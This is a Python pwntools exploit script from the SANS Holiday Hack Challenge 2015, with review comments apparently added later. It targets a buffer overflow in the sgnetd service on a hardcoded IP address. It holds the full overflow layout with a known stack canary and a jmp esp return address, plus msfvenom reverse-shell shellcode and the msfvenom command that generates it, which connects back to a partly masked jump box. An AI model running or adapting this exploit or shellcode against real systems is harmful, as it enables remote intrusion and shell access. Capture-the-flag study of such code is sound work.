Script used to exploit SG05, a server vulnerable to a buffer overflow in sgnetd, during the SANS Holiday Hack Challenge 2015.
#/bin/python
# NOTE(review): the shebang above is missing the "!" ("#!/bin/python"), so the
# file is only runnable via an explicit interpreter invocation.
# Uses pwntools: https://github.com/Gallopsled/pwntools
from pwn import *
#TARGET_SERVER = "127.0.0.1"
TARGET_SERVER = "54.233.105.81"
TARGET_PORT = 4242
# Import-time side effect: the TCP connection is opened as soon as this module
# is loaded, not when main() is called.
conn = remote(TARGET_SERVER, TARGET_PORT)
# Jump box is at 192.241.XXX.XXX
# msfvenom -a x86 --platform linux -p linux/x86/shell_reverse_tcp2 LHOST=192.241.XXX.XXX LPORT=4444 -f python
# Payload bytes as emitted by the msfvenom command above (per the author's
# comment); they are opaque here and tied to that LHOST/LPORT.
buf = ""
buf += "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66"
buf += "\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\xc0"
buf += "\xf1\xdb\xbf\x68\x02\x00\x11\x5c\x89\xe1\xb0\x66\x50"
buf += "\x51\x53\xb3\x03\x89\xe1\xcd\x80\x52\x68\x2f\x2f\x73"
buf += "\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xb0"
buf += "\x0b\xcd\x80"
# Important values:
# Hardcoded canary
# NOTE(review): a canary that never changes between runs offers no protection;
# the overflow just writes the known value back in place. This is the defect
# the challenge binary exhibits, and the reason a random per-process canary is
# the mitigation.
CANARY = 0xe4ffffe4
# Our jmp esp ROP gaget
# Fixed address: assumes the binary is not position-independent (no ASLR for
# its text segment) -- not verified here.
NEW_EIP = 0x0804936b
# Layout as written: 103 filler bytes, the canary, 4 bytes (presumably the
# saved frame pointer), the return address, 6 bytes of padding, then the
# payload. All offsets are specific to this challenge binary.
OVERFLOW_STRING = "A" * 103 + pack(CANARY)+ "B"*4 + pack(NEW_EIP) + "C"*6 + buf
def main():
    """Drive the exploit exchange over the module-level `conn`.

    Uses the connection opened at import time and the module-level
    OVERFLOW_STRING. The recvuntil/sendline sequence mirrors the order of
    the remote service's prompts and must not be reordered. Written for
    Python 2 (print statements).
    """
    print "Starting tcp client..."
    # Read until the character "3" appears -- presumably the last entry of a
    # menu -- then answer with "X".
    print conn.recvuntil("3")
    print conn.sendline("X")
    # Wait for the banner that ends in "protected!" before sending the buffer.
    print conn.recvuntil("protected!")
    conn.sendline(OVERFLOW_STRING)
    # Interactive session left disabled by the author.
    #conn.interactive()
# Script entry point; note the connection itself is already opened at import.
if __name__ == '__main__':
    main()